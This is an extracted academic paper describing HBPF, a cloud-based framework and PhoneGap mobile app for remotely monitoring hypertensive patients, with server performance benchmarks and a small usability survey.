Pres- sure Framework. This allows hypertensive patients to communicate with their health-care centers, thus facilitating monitoring for both patients and clinicians. HBPF provides a complete, efficient, and cross-platform frame- work to follow up hypertensive patients with an SLA guarantee. Response time below one second for 80 000 requests and 28% increase in peak through- put going from one to three virtual machines were obtained. In addition, a mobile app (BP) for Android and iOS, with a user-friendly interface, is also provided to facilitate following up hypertensive patients. Among them, be- tween 54% and 87% favorably evaluated the tool. BP can be downloaded for free from the website Hesoft Group repository (http://www.hesoftgroup.eu). Email addresses: jcuadrado@hesoftgroup.eu (Josep Cuadrado), jordi@diei.udl.cat (Jordi Vilaplana), jmateo@diei.udl.cat (Jordi Mateo), francesc@diei.udl.cat (Francesc Solsona), sara@hesoftgroup.eu (Sara Solsona), jrius@diei.udl.cat (Josep Rius), ralves@cmb.udl.cat (Rui Alves), camafort@clinic.cat (Miquel Camafort) 1Corresponding author 1. Introduction19 Hypertension is one of the most important risk factors in cardiovascular20 diseases, the leading cause of death worldwide [1]. It affects about 20% of21 the adult population, a percentage that increases with age [2].22 Home blood pressure (HBP) consists of patients taking readings at home23 and registering these using a digital device. The patients then send the24 readings to a health professional who is responsible for taking appropriate25 action [3].26 In a recent scientific article, the American Heart Association concluded27 that HBP monitoring should become a routine component of blood pressure28 measurement in the majority of patients with known or suspected hyperten-29 sion [3]. HBP readings may also be better predictors of cardiovascular and30 renal outcomes than surgery readings [4, 5]. Furthermore, HBP readings31 provide a more accurate assessment of true blood pressure than alternative32 measurement methods, such as surgery blood pressure or rapid titration of33 antihypertensive therapy. They also avoid the white-coat syndrome and fa-34 cilitate the identification of masked hypertension, leading to a greater patient35 involvement in managing hypertension, a condition that is typically asymp-36 tomatic [6].37 Having ways to monitor HBP in a continuous and rigorous way, with a38 fluid communication between patient and doctor may be crucial in ensuring39 satisfactory control of blood pressure, which is currently a great challenge.40 Information and communication technology (ICT) can play an important role41 in achieving this monitoring capabilities [7, 8]. In this context, we developed42 and present HBPF (Home Blood Pressure Framework). HBPF is made up of43 two parts, the HM (Hypertension Module) server and the BP (Blood Pressure44 monitoring) mobile app.45 HBPF provides high performance for a given SLA (Service Level Agree-46 ment). An SLA is a contract negotiated and agreed between a customer47 and a service provider for which a customer only pays for the resources and48 services used according to negotiated performance requirements at a given49 price [8, 11]. Throughput is one of the most important performance metric50 in a cloud-computing context [8, 11]. It was also the performance parameter51 chosen in this work to fix the SLA.52 Frameworks such as HBPF generate large amounts of data that need to53 be continuously stored, processed, and available. This require the use of54 cloud computing services [12]. Earlier versions of the concept underlying55 2 HBPF [8, 11, 13] were tested in a private cloud-based server, before mov-56 ing the HM into a real-world cloud environment. These applications used57 SMS communications between clinicians and patients. This was limiting in58 many ways. The current platform uses Internet communication, providing59 physicians with access to standard medical records and allowing them to60 write reports and to follow up and communicate (i.e. charting and sending61 videos) with patients by means of HBPF. Efforts were made to design a scal-62 able framework when the number of both patients and hospitals increased63 by providing Service Level Agreement (SLA) guarantees [13, 14, 15, 16, 17].64 The remainder of the paper is organized as follows. Section 2 details the65 related work addressing the problem of tele-moritoring hypertensive patients.66 In Section 3.1, we present HM. Section 3.2 is devoted to explaining the op-67 eration and functionality of the BP app. This app and its performance is68 evaluated in Section 4. Finally, Section 5 outlines the main conclusions and69 future work.70 2. Related Work71 There is a potentially important role for novel techniques to lower er-72 rors in collecting blood pressure readings, especially in primary care, where73 management of hypertension mainly takes place [6, 18]. One such techniques74 is mHealth - health care and public health practice supported by mobile75 devices [19].76 Earlier work identified 60 web sites that provided functionality to manage77 and present home blood-pressure readings. Out of these, 20 could be freely78 used. A comparison between these 20 web sites was carried out between June79 and August 2009 [20]. The results showed that none of these 20 web sites80 were directly linked to common electronic medical records. In addition, none81 of them provided any tools for sending alert messages in any format.82 Studies have shown the positive impact of mHealth on adherence-related83 behavior among patients. For example, short message service (SMS) ap-84 pointment reminders have led to an increase in attendance of HIV [21], tu-85 berculosis [22], and quitting tobacco patients [11, 13]. Patient-physician86 short messaging through a telemedicine system was also tested as a means87 to improve control of hypertension in the follow-up of medium-to-low-risk88 patients in primary care [23]. A control group (CG) recorded the data on89 paper and could only deliver it to their GP personally in routine visits. This90 study showed that 50% of the telemedicine-enabled patients strictly adhered91 3 to the treatment protocol, versus 25% in the CG. This suggests that more92 flexible and continuous ways of interaction and follow up of patients might93 have a greater impact in treatment adherence.94 A study among 107 mHealth articles assessed the role of adherence of95 patients to chronic diseases management [24]. 40.2% (43/107) of studies96 used SMS exclusively and 23.4% used specialized software or a smartphone97 app. These programs focused mainly on a combination of devices, such as an98 electrocardiogram or a BP monitor. As a conclusion, the authors suggested99 that future mHealth tools need to provide optimal user-interfaces, or targeted100 motivational messages.101 With all this in mind, we designed and implemented HBPF to include a102 flexible and user friendly interface that provides motivational messages to the103 patients and enable immediate and real-time communication between patient104 and physician by means of the BP app. In addition, the app provides self-105 monitoring, reading sampling, charts, reports, tips, and advice, in line with106 other existing hypertension apps (see Table 1, for a comparison of the main107 features between the various apps). However, with the exception of BP, none108 of the apps features on-line physician support for the patient, chat between109 physician and patient, or broadcasting communication among a group of110 patients. In addition, BP is the only app available for both, iOS and Android111 operating systems.112 app DC NC Charts RH AB AP OS BP Lite No No Yes Yes No No iOS iBP No No Yes Yes No No iOS IBPTouch No No Yes Yes No No iOS BPMonitor No No Yes Yes No No iOS BP Yes Yes Yes Yes No No iOS/Android iCare BP Monitor No No Yes Yes No Yes Android BP Watch No No Yes Yes No No Android Finger BP Prank No No No No No Yes Android Table 1: Comparison between BP with other similar hypertension apps. app: Application name. DC: Doctor Chat (direct chatting with the physician). NC: Nearby centers (pro- vides information about the distance to specialized centers). Charts: graphical evolution Charts. RH: Readings’ History. AB: Automatic sampling of the Blood Pressure by means of an external device. AP: Automatic sampling of the pulse rates by means of an external device. OS: Operating System. 4 https://itunes.apple.com/us/app/blood-pressure-lite-bp-tracker/id534134435?mt=8 https://itunes.apple.com/us/app/ibp-blood-pressure/id306526794?mt=8 https://itunes.apple.com/kh/app/ibptouch-blood-pressure-tracking/id307828432?mt=8 https://itunes.apple.com/us/app/bpmonitor/id423175333?mt=8 http://www.hesoftgroup.eu/index.php?option=com_content&view=article&id=87&Itemid=220 https://play.google.com/store/apps/details?id=comm.cchong.BloodPressure https://play.google.com/store/apps/details?id=com.boxeelab.healthlete.bpwatch https://play.google.com/store/apps/details?id=com.galaxyfinger.fingerboodstar HBPF provides a means to communicate across a wide range of platforms113 and devices with a doctor, as does HealthTap. In addition, HBPF provides a114 complete, efficient, and cross-platform framework to follow up hypertensive115 patients with an SLA guarantee. Furthermore, the transparent architecture116 of HBPF was designed to facilitate the involvement of additional third par-117 ties, and the integration with existing healthcare systems, while providing118 ad-hoc adaptation of monitoring parameters to each individual, in a similar119 way to [25].120 3. HBPF121 Fig. 1 summarizes the overall operation of HBPF. First of all, patients122 send their readings with the BP app from a smart phone to the server (1),123 via Internet (2).124 Mobile Clinician Internet Blood pressure Pa5ent database Server 1 2 3 5 4 HM BPcontrol Figure 1: HBPF operation. On receiving a message, the server redirects it to the cloud-based HM. HM125 is responsible for checking and saving the readings in a database. Clinicians126 can inspect the patients’ readings from the database (3). Next, depending127 on the data and the criteria specified by the clinicians, HM responds to the128 patient’s mobile with another message through the server (4 and 5). HM129 also provides additional facilities to follow up hypertensive patients.130 The main objective of the BP app is to extend the communication systems131 of the HM tool, adding the most widely used communication functionalities132 for smartphones. These include instant messaging (chat), among others. In133 this way, patients participate actively in controlling their disease and follow134 their medical evolution, communicating with the medical team in real time.135 5 http://www.healthtap.com 3.1. Hypertension Module (HM)136 Figure 2: HM. The names that appear in the figure are invented. The Hypertension Module (HM) (see Fig. 2) was designed for collect-137 ing and managing data from hypertensive patients. Its functions are to138 record and print/display measurement statistics, show the evolution of pa-139 tients graphically using charts, provide instant messaging tools (i.e. chat),140 aid clinicians with diagnose, and generate alerts or suggestions for treatment,141 patient monitoring, medication and nutrition, among others.142 One of the main features of HM is that it plots patients’ readings (systole143 and diastole blood pressures and pulse). These readings can be registered144 automatically by means of the BP app or manually by the clinicians. HM145 automatically calculates the mean values for each day, showing an overall146 average value per day in the plot. HM performs a data verification check,147 in order to avoid incorrect or invalid measurements, such as negative or148 physically implausible values.149 HM allows target limits from both systole and diastole blood pressures to150 be established individually depending on the characteristics of each patient.151 If these limits are exceeded, an alert is shown on the main page of the HM152 tool, so that clinicians can act quickly and, if needed, intervene or send an153 alert message to the patient.154 HM is currently designed to communicate with the patients through an155 Internet connection (via a smartphone with the BP app). This somewhat156 6 determines the design of the architecture, currently made up of a server and157 a database (see Fig. 1). In order to increase the reliability and availability158 of the overall system, the server can contain multiple processing units, like159 processors, cores, or Virtual Machines. As the current web servers are usually160 mounted on cloud systems, “VMs” is the terminology used from here on. An161 analysis of the performance provided by the server according to the number162 of VMs is performed in the results section (Sec. 4).163 The clinician is responsible for registering the patient in the HM tool.164 Once registration is done, the patient must send the blood pressure mea-165 sured at home through BP on a weekly or biweekly basis, depending on the166 requirements established by the doctor. This design feature facilitates future167 deployment of personalized medicine approaches to the treatment and follow168 up of hypertensive patients.169 According to the personalized monitoring plan of each patient, the system170 periodically reminds the patient to send their blood pressure readings. The171 system monitors that the data format and values it receives are appropriate,172 before recording them and sending a message to the BP app. The contents173 of the message depend on the information entered by the medical team and174 on the readings provided by the patients.175 3.1.1. HM Architecture176 The cloud-based architecture of HM scales easily with increasing number177 of patients, physicians, and hospitals. This is done by using the SLA to178 adjust the number of available Virtual Machines (VMs, widely used in cloud179 computing environments) and the number of requests entering the module180 (see [14, 16, 17, 13] for more information).181 The current HM architecture is made up of 2 hosts (nodes), each with182 one AMD Opteron 6100 processor of 12 cores running at 2.1GHz (see Fig 3).183 We plan to add more hosts as the system grows. Note that nodes can be184 different, conforming a heterogeneous framework. All the software technolo-185 gies used to implement HBPF were carefully selected with several criteria in186 mind. First, they had to be open-source, in order to facilitate future shared187 development of the apps. In addition, these technologies had to be robust,188 efficient, and be widely deployed and supported. VMs are deployed across189 the hosts on top of the OpenStack2. OpenStack is an open source Cloud plat-190 2OpenStack. http://www.openstack.org 7 form that allows to manage and deploy large networks of Virtual Machines.191 All the VMs run Ubuntu GNU/Linux 3.2.0-41-virtual x86 64. We believe192 in a distributed design because the degree of administrative and geographic193 scalability increases with the number of hosts.194 Apache Scheduleer MySQL Cluster VM VM VM VM VM VM host 1 host 2 OpenStack OpenStack Task Firewall AJP Figure 3: HM architecture. The scheduler is mapped into a VM with 512MB RAM and 1 core in host195 1. It is implemented using the Scheduler of Apache Tomcat 7. The rest of196 VMs, that service the requesting tasks, are provided with 4GB and 2 cores.197 These VMs are the computing VM nodes, where the HM module copies (each198 performing the same operation) are deployed on top of Apache Tomcat3, an199 open-source web server developed by the Apache Software Foundation (ASF).200 Task scheduling determines which VM executes the tasks. VM consol-201 idation instead determines the mapping of VMs to hosts. The HM task202 scheduling and VM consolidation follows a Round-robin policy, which states203 that tasks (VMs) are assigned to VMs (hosts) by following a circular ring204 ordering.205 All VMs are configured with the AJP (Apache JServ Protocol - Apache206 Tomcat Connector) protocol enabled, which is used by the scheduler to com-207 3Apache Tomcat. http://tomcat.apache.org/ 8 http://httpd.apache.org/docs/2.2/mod/mod_proxy_balancer.html http://tomcat.apache.org/ http://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html municate with the nodes. AJP is a protocol that can proxy inbound requests208 from a web server (Apache HTTP server) to an application server (Tomcat).209 The database is implemented using a MySQL Cluster4, a technology210 that provides shared-nothing clustering and auto-sharding for the MySQL211 database management system. The database is distributed between the212 hosts (nodes) making up the cloud framework. The MySQL Cluster is im-213 plemented with 2 VMs with 4GB RAM and 2 cores (of two different hosts).214 Having multiple computing and data-sites ensures a high degree of load and215 administrative scalability and reliability.216 3.2. BP217 BP is designed to update and expand the current system of communi-218 cation with the HM tool, offering an application that was not previously219 available for smart phones. BP is a user-friendly app that extends the HM220 services to Android and iOS smartphones.221 3.2.1. BP Design222 Currently, there are many alternative technologies for developing applica-223 tions for mobile devices. An important design requirement was that the ap-224 plication should be compatible with all the major platforms Android and iOS.225 Because of this, the BP app was implemented using HTML, CSS, Javascript,226 JQuery Mobile and PhoneGap5.227 PhoneGap is an open-source development tool for creating cross-platform228 mobile applications with countless libraries available for use. PhoneGap has229 APIs to control I/O devices efficiently (such as cameras, GPS, databases, file230 system, etc.) in a similar way to those obtained with native code. Phonegap231 currently supports the two mainstream platforms (Android and iOS).232 The features that retrieve information from HM need to establish a con-233 nection by means of web services. This ensures low data capacity require-234 ments and avoids legal problems, as medical data is only stored in HM instead235 of in each individual smartphone. However, this introduces a low penalty in236 obtaining the required information remotely, although it does not signifi-237 cantly affect the user experience. We created ad hoc web services, which are238 used to exchange data in JSON format between the clients (BP instances)239 and the server (HM).240 4MySQL Cluster. https://www.mysql.com/products/cluster/ 5PhoneGap. http://phonegap.com. 9 3.2.2. BP Operation241 The BP app can be used to register patients, edit their profile, download242 or upload data regarding blood pressure and pulse readings from/to the HM243 server, visualize informative videos uploaded by the clinicians, analyze pa-244 tient trends by plotting and listing the evolution of the patients’ state and245 readings, and provide information about collaborating hospitals. Finally BP246 can be used for chatting (instant messaging) between patients and clinicians.247 Whenever required, a patient can easily ask the doctor a question through248 the chat window.249 The application also helps the patients with useful advice. Once the250 blood pressures and the pulse have been sent, the app immediately shows251 the results of the analysis (done in HM) through a traffic light indicating the252 status of the patient. In addition, a short message indicates medical advice.253 The medical advice depends on the results of the analysis of the readings.254 There are three possible states (light colors) and three associated mes-255 sages:256 Good (green). Everything was fine. Remember to keep measuring and257 sending your pressure readings.258 Regular (yellow). Do not forget, salt-free diet. Remember to take the259 medication and do some physical activity.260 Bad (red). We have seen your records, do not worry. We will contact you261 to bring your next clinical appointment forward.262 BP can show a graphic evolution of the patients’ measurements. Different263 types of visualization can be chosen. By clicking global, the plot of the264 blood pressure (Fig 4) appears. The morning and afternoon buttons separate265 the samples by these times of day. Start and finish dates can be selected.266 Alternatively, 1, 3 and 6 months selectors are available.267 4. Results268 Here we report a series of benchmark experiments used to evaluate the269 performance and efficiency of HBPF. We benchmark HM and the BP app270 separately and present the results in sections 4.1 and 4.2 respectively.271 The main performance criteria by which the HM server and the BP app272 should be evaluated are only partially overlapping. Because of this we sep-273 arately evaluated the server and the app. For the HM server we evaluated274 10 Figure 4: Consultation readings for blood pressure. response time, throughput, and scalability. For the BP app, we evaluated275 startup time, communication time and usability.276 4.1. HM277 4.1.1. Testbed278 Experiments on the HM tool were carried out on 5 Virtual Machines279 [V M1 . . . V M5] deployed over OpenStack, installed on a host with 1 AMD280 Opteron processor with 12 cores running at 2.1 GHz each. To emulate VM281 heterogeneity, we set V M1 . . . V M5 with 4GB RAM and 2 cores.282 Application stress tests via HTTP requests were performed using the283 Apache JMeter6 tool, which measures performance and functional behavior.284 These requests simulated patients consulting or introducing their data and285 clinicians using HM.286 The effect of number of simultaneous requests on HBPF performance was287 tested by systematically varying the number of users. There were generated288 100 requests per user. All users would be performing their requests within289 a single 50 sec. period. The time between user requests was constant and290 therefore these requests were uniformly distributed in the 50 second test291 interval.292 6JMeter. http://jmeter.apache.org/ 11 The performance metric we used was the Response Time and Through-293 put, as these parameters are widely used for measuring system efficiency.294 Throughput was also the parameter chosen to fix the SLA.295 4.1.2. Response Time296 Testing the response time of the application was done using all five avail-297 able VMs. Fig. 5 summarizes the response time of the system in terms of298 the median, average and 90% Line when the number of users increased from299 200 to 800. The 90% Line (or 90th percentile) is the value below which 90%300 of the samples were processed in less than the time specified on the y-axis.301 This metric is more meaningful than the median or average value in terms of302 SLA (Service Level Agreement). Although the system starts to overload at303 80,000 requests (i.e. 800 users), the average and median response time still304 remains below 1 second (the users will not notice a lack of interactivity with305 the system). Obviously, worser results were obtained for the 90% Line (1,7306 s).307 0 200 400 600 800 1000 1200 1400 1600 1800 20 30 40 50 60 70 80 T im e ( m s ) # Requests (thousands) 90% Line Average Median Figure 5: Evolution of response time (average, median and 90% Line). 4.1.3. Throughput308 Another measure of efficiency is throughput (TR), which is defined as the309 number of requests served per unit of time:310 TR = number of requests time (1) Here, we benchmark the effect of changing the number of available VMs311 on the TR and the number of users from 50 to 800. Fig. 6 compares the312 12 0 100 200 300 400 500 600 700 800 900 0 10 20 30 40 50 60 70 80 T h ro u g h p u t # Requests (thousands) 5 VM 3 VM 1 VM Figure 6: Evolution of system throughput when using 1, 3 and 5 VMs. TR of the system when we use one (VM1), three (VM1-VM3), or five VMs313 (VM1-VM5). Fig. 6 summarizes the results.314 A general feature of the system’s response is that TR increases linearly315 with the number of requests, until it peaks at approximately 40,000 requests316 (30,000 for 1 VM). After this threshold, TR performance decreases slightly317 and the SLA is not guaranteed. We note that the SLA should be fixed318 according to the required TR, depending on the number of requests and319 the number of VMs available. This behaviour is consistent with previous320 simulations of a similar model system, using an approach based on queuing321 theory[15, 16].322 Going from one to three VMs leads to an increase in peak TR of 28,5%.323 In contrast, going from three to five VMs leads to an increase in peak TR324 of approximately 16,8%. This suggests that peak relative performance in-325 crement decreases every time additional VMs are activated. Internal tests326 suggest that this loss was due to the delay introduced by the remote commu-327 nication between VMs located in different cores, which is a known frequent328 bottleneck in distributed computing applications.329 Thus, as was the case in the simulated system [15, 16], we face a situation330 where our system overloads, leading to a significant increase in the response331 time and a decrease in TR. However, in contrast with the simulated system,332 adding more VMs to the real HBPF system only partially solves the problem,333 and a law of diminishing returns is observed with an increase in number of334 VMs. Overall, these experiments suggests that the most efficient strategy for335 distributing work between VMs allocated to HBPF is to first deploy work to336 13 local VMs. When these are saturated, work should then be sent to remote337 VMs.338 4.1.4. Scalability339 We also investigated the scalability of the system in its cloud environ-340 ment by using an event-driven simulator to test the behaviour of that en-341 vironment. We use the CloudSim 3.0.2 software [26] in these tests because342 it allowed us to easily emulate the HBPF architecture presented and evalu-343 ated in sections 3.1.1 and 4.1 respectively. CloudSim allows the behaviour of344 the AMD Opteron 6,100 (the one chosen for this simulation) to be emulated.345 The CloudSim task scheduling and VM consolidation followed a Round-robin346 policy. As we chose the same processor and scheduling policies as the HM347 architecture (see section 3.1.1), the results obtained in the simulation should348 be directly applicable to the real system.349 Fig. 7 shows the system behavior when scaling it by increasing the num-350 ber of VMs and hosts. VMs were made up of 2 cores and 4GB each. As351 in section 4.1, one host was made up of one processor. The simulation en-352 vironment was carried out by executing 1, 000 tasks with a size of 100, 000353 instructions each. Further experiments varying these parameters gave pro-354 portional results.355 1 2 3 4 0 20 40 60 80 100 0 400 800 1200 1600 Hosts VM 0 400 800 1200 1600 Figure 7: Execution times depending on the number of VMs and the number of hosts. We can appreciate that increasing the number of VMs and hosts signifi-356 14 cantly decreases the total execution time (in time units) of the overall tasks.357 Fig. 7 shows that by adding VMs, the performance approaches asymptoti-358 cally to a limit where it does not have enough computational resources (RAM,359 CPUs, etc.. making up the hosts) to map the tasks, and so the execution360 time stabilizes. Similar behavior occurs when adding more hosts without361 adding more VMs.362 4.2. BP363 4.2.1. Performance364 Typically, two important bottlenecks in application performance are the365 start up of the app and the operational processes in which that app accesses366 Internet.367 BP was installed and tested on smartphones and tablets running modern368 versions of Android and iOS. The devices and operating systems used to369 verify the correct operation of BP are listed in Table 2. This table shows370 the elapsed time of the start up for BP. These times were the average of 3371 independent measurements.372 Device Operating System BP start up time Samsung Galaxy S2 Android v. 4.2.2 10.583 Samsung Galaxy S3 Android v. 4.3 10.121 Nexus 5 Android v. 5.1.1 9.638 Ipad 2 iOS v. 8.4 10.346 Iphone 6 iOS v. 8.4 9.949 Table 2: Performance comparison between devices (in ms). The cross-reference APIs used by PhoneGap introduced a considerable373 penalisation in the BP start up time (10 ms). However, the application374 performed well in all the tested devices. In all cases, overall response time375 fell below one second, which guarantees that the user’s flow of thought is376 uninterrupted [27].377 The communication time sending a chat message to HM was also mea-378 sured. To do so, we computed the average time for all Android and iOS379 devices. We tested two types of connections, WiFi (with 100 Mb/s download380 and 10 Mb/s upload speed) and 4G Data Internet. Each experiment was381 repeated 10 times per device. Communications were very fast, taking on382 average 329 ms for WiFi and 861 ms for 4G. WiFi bandwidth was entirely383 15 dedicated to communications done using the BP app. This validates the384 design of the communication mechanism between the app and HM.385 4.2.2. Usability386 Here we perform a preliminary evaluation of BP’s usability. This was done387 by asking both, clinicians and patients, to fill in a Google-forms questionnaire.388 This questionnaire was sent by the HM server to all 90 registered patients389 and the 3 clinicians of the Clinic hospital of Barcelona. 38 patients and all390 the clinicians answered it. Table 3 summarizes the results of this evaluation.391 This table only shows the affirmative answers.392 Clinicians are highly satisfied with the app and all are convinced of its393 usefulness and efficiency. In addition, they don’t find its use monotonous. In394 addition, two of the three clinicians found BP very easy to use. We note that395 these evaluations are anecdotal and a larger number of clinicians must answer396 the survey before we can come to a reasonable conclusion about usability of397 BP from the clinician’s point of view. In terms of user evaluation, we focus398 more on the feedback from patients than that from clinicians for two reasons.399 First, patients will be the vast majority of final BP users. Second, we need to400 obtain input from additional clinicians, given the low number of professionals401 that answered the survey. Between 54% and 87% of all patients reported full402 satisfaction with the various aspects of using the BP app, indicating that403 they are mostly happy with the application. The weakest point we detected404 was that 39% of the patients found the use of BP monotonous. This is in405 striking difference with the clinicians that had the opposite opinion. We406 need to further and specifically understand what the patients found boring407 in order to improve that aspect of the app.408 In general, clinicians and patients recognized the usefulness of the app409 for remote monitoring of hypertensive patients and to reduce traveling costs.410 We note that we are now in the process of compiling patient and clinician411 suggestions to help us improve the user-friendliness of the app.412 5. Conclusions413 This article presents HBPF, an efficient eHealth framework to manage414 and follow up hypertensive patients. HBPF comes with with SLA guarantees415 and it can significantly reduce the costs associated with patient travelling.416 Its efficiency and SLA guarantees are provided by HM, the HBPF server417 component.418 16 Question Patients Clinicians Would you recommend it? 87 100 It is useful for monitoring hypertension? 73 100 Is it use monotonous? 39 0 Is it easy to use? 79 66.6 Is it useful to reduce the visits to the hospital? 82 100 Table 3: Evaluating the use of BP. Affirmative answers (in %). The use of PhoneGap when implementing BP was a successful decision419 because it has proven to be a very suitable framework for cross-platform420 applications, increasing its flexibility and functionality. We tested its perfor-421 mance in the iOS and Android operating systems on both smartphones and422 tablets. Despite the difficulties of adapting the interface in some cases, the423 results achieved were satisfactory.424 However, the user experience could possibly be improved by using native425 development due to the fact that PhoneGap has a slightly higher response426 time than native applications. Accordingly, we are migrating the current ap-427 plication to native environments for iOS and Android platforms. We expect428 to improve this aspect, which we assume will be temporary. We will then429 compare the performance of PhoneGap against native frameworks.430 Future trends are aimed at testing how the use of this comprehensive and431 personalized monitoring tool can minimize the risk of heart attacks, strokes432 and other effects of hypertension. We plan to add a wireless or bluetooth433 interface to the sampling device without requiring the patient to manually434 submit the data, thus facilitating automatic data transfer and avoiding tran-435 scription errors. Moreover, we plan to implement data analytics so we can436 provide aggregated data to the clinicians in order to detect trends and pat-437 terns within their patient groups.438 References439 [1] R Craig, J Mindell, eds. Health survey for England 2006. London: Her440 Majesty’s Stationery Office. 2006.441 [2] Hypertension in the very old; prevalence, awareness, treatment and con-442 trol: a cross-sectional population-based study in a Spanish municipality.443 http://www.biomedcentral.com/1471-2318/9/16.444 17 [3] Pickering TG, Miller NH, Ogedegbe G, Krakoff LR, Artinian NT, Goff445 D, American Heart Association, American Society of Hypertension, Pre-446 ventive Cardiovascular Nurses Association. Call to action on use and re-447 imbursement for home blood pressure monitoring: a joint scientific state-448 ment from the American Heart Association, American Society of Hyper-449 tension, and Preventive Cardiovascular Nurses Association. J Cardiovasc450 Nurs, 23(4):299-323. 2008.451 [4] Ohkubo T, Imai Y, Tsuji I, Nagai K, Kato J, Kikuchi N, Nishiyama452 A, Aihara A, Sekino M, Kikuya M, Ito S, Satoh H, Hisamichi S. Home453 blood pressure measurement has a stronger predictive power for mortality454 than does screening blood pressure measurement: a population-based455 observation in Ohasama, Japan. J Hypertens, 16(7):971-975. 1998.456 [5] Bobrie G, Chatellier G, Genes N, Clerson P, Vaur L, Vaisse B, Menard J,457 Mallion JM. Cardiovascular prognosis of masked hypertension detected458 by blood pressure self-measurement in elderly treated hypertensive pa-459 tients. JAMA, 291(11):1342-1349. 2004.460 [6] McManus RJ, Mant J, Bray EP, Holder R, Jones MI, Greenfield S,461 Kaambwa B, Banting M, Bryan S, Little P, Williams B, Hobbs FD. Tele-462 monitoring and self-management in the control of hypertension (TAS-463 MINH2): a randomised controlled trial. The Lancet, 376(9736):163-172.464 2010.465 [7] Green BB, Cook AJ, Ralston JD, Fishman PA, Catz SL, Carlson J,466 Carrell D, Tyll L, Larson EB, Thompson RS. Effectiveness of Home467 Blood Pressure Monitoring, Web Communication, and Pharmacist Care468 on Hypertension Control: A Randomized Controlled Trial. JAMA,469 299(24):2857-2867. 2008.470 [8] Vilaplana J, Solsona F, Abella F, Cuadrado J, Teixidó I, Mateo J, Rius J.471 H-PC: A Cloud Computing Tool for Supervising Hypertensive Patients.472 Journal of Supercomputing, 71(2):591-612. 2015.473 [9] Law MR, Morris JK, Wald NJ. Use of blood pressure lowering drugs in the474 prevention of cardiovascular disease: meta-analysis of 147 randomised tri-475 als in the context of expectations from prospective epidemiological stud-476 ies. BMJ, 338:b1665. 2009.477 18 [10] Dickinson HO, Mason JM, Nicolson DJ, Campbell F, Beyer FR, Cook478 JV, Williams B, Ford GA. Lifestyle interventions to reduce raised blood479 pressure: a systematic review of randomized controlled trials. J Hyper-480 tens, 24 215-33. 2006.481 [11] Vilaplana J, Solsona F, Abella F, Cuadrado J, Alves R, Mateo J. S-PC:482 An e-treatment application for management of smoke-quitting patients.483 Computer Methods and Programs in Biomedicine, 115(1):33-45. 2014.484 [12] Abbas A, Khan SU. A Review on the State-of-the-Art Privacy-485 Preserving Approaches in the e-Health Clouds. Journal of Biomedical486 and Health Informatics, 18(4):1431-1441. 2014.487 [13] Vilaplana J, Solsona F, Abella F, Cuadrado J, Teixidó I, Mateo J, Rius488 J. H-PC: a cloud computing tool for supervising hypertensive patients.489 The Journal of Supercomputing, 71(2):591-612. 2015.490 [14] Mateo J, Vilaplana J, Pla LM, Lerida JL, Solsona F. A Green Strat-491 egy for Federated and Heterogeneous Clouds with Communicating Work-492 loads. The Scientific World Journal, 2014:1-11. 2014.493 [15] Vilaplana J, Solsona F, Abella F, Filgueira R, Rius J. The cloud494 paradigm applied to e-Health. Bmc Medical Informatics And De-495 cision Making, Vol 13(35):1-10. http://www.biomedcentral.com/1472-496 6947/13/35. 2013.497 [16] Vilaplana J, Solsona F, Teixidó I, Mateo J, Abella F, Rius J. A queuing498 theory model for cloud computing. Journal of Supercomputing, 6(1):492-499 507. 2014.500 [17] Vilaplana J, Solsona F, Mateo J, Teixido I. SLA-Aware Load Balancing501 in a Web-Based Cloud System over OpenStack. Lecture Notes in Com-502 puter Science, 8377:281-293. 2014.503 [18] Lai CC, Lee RG, Hsiao CC, Liu HS, Chen CC. A H-QoS-demand per-504 sonalized home physiological monitoring system over a wireless multi-hop505 relay network for mobile home healthcare. Journal of Network and Com-506 puter Applications, 32(6):1229-1241. 2009.507 [19] World Health Organization. Second Global Survey on eHealth (Global508 Observatory for eHealth). Geneva: World Health Organization; 2011.509 19 mHealth: New horizons for health through mobile technologies510 URL: http://www.who.int/goe/publications/goe mhealth web.pdf. Ac-511 cessed 2016-01-04.512 [20] Patel B, Turban S, Anderson C, Charleston J, Miller E, Appel L. A Com-513 parison of Web Sites Used to Manage and Present Home Blood Pressure514 Readings. J Clin Hypertens, 6:389-395. 2010.515 [21] Bigna JJR, Noubiap JJN, Kouanfack C, Plottel CS, Koulla-Shiro S.516 Effect of mobile phone reminders on follow-up medical care of children517 exposed to or infected with HIV in Cameroon (MORE CARE): a mul-518 ticentre, single-blind, factorial, randomised controlled trial. The Lancet519 Infectious Diseases, 14(7):600-608. 2014.520 [22] Liu Q, Abba K, Alejandria MM, Sinclair D, Balanag VM, Lansang MA.521 Reminder systems to improve patient adherence to tuberculosis clinic522 appointments for diagnosis and treatment. Cochrane Database Syst Rev,523 18(11):CD006594. 2014.524 [23] Carrasco MP, Salvador CH, Sagredo PG, Márquez-Montes J, González525 de Mingo MA, Fragua JA, Rodŕıguez MC, Garćıa-Olmos LM, Garcia-526 López F, Carrero AM, Monteagudo JL. Impact of patient-general practi-527 tioner short-messages-based interaction on the control of hypertension in528 a follow-up service for low-to-medium risk hypertensive patients: a ran-529 domized controlled trial. IEEE Trans Inf Technol Biomed, 12(6):780-91.530 2008.531 [24] Hamine S, Gerth-Guyette E, Faulx D, Green BB, Ginsburg AS. Impact532 of mHealth Chronic Disease Management on Treatment Adherence and533 Patient Outcomes: A Systematic Review. J Med Internet Res, 17(2):e52.534 2015.535 [25] Benharref A, Serhani MA. Novel cloud and SOA-Based framework for536 E-health monitoring using wireless biosensors. Biomedical and Health537 Informatics, IEEE Journal of 18(1):46-55. 2013.538 [26] Calheiros R, Ranjan R, Beloglazov A, De Rose C, Buyya R. CloudSim:539 A Toolkit for Modeling and Simulation of Cloud Computing Environ-540 ments and Evaluation of Resource Provisioning Algorithms. Software:541 Practice and Experience, 41(1):23-50. 2011.542 20 [27] Miller RB. Response time in man-computer conversational transactions.543 Proc. AFIPS Fall Joint Computer Conference, 33:267-277. 1968.544 21 Figure 1(on next page) HBPF operation Mobile Clinician Internet Blood pressure Pa5ent database Server 1 2 3 5 4 HM BPcontrol 2 HM. The names that appear in the figure are invented Figure 3(on next page) HM Architecture Apache Scheduleer MySQL Cluster VM VM VM VM VM VM host 1 host 2 OpenStack OpenStack Task Firewall AJP 4 Consultation readings 5 response time 6 throughput 7 scalability work_77qqyvwmkzehpc4drzvfito2hi ---- Submitted 10 August 2016 Accepted 11 June 2017 Published 17 July 2017 Corresponding author Evangelia I. Zacharaki, evangelia.zacharaki@centralesupelec.fr Academic editor James Procter Additional Information and Declarations can be found on page 14 DOI 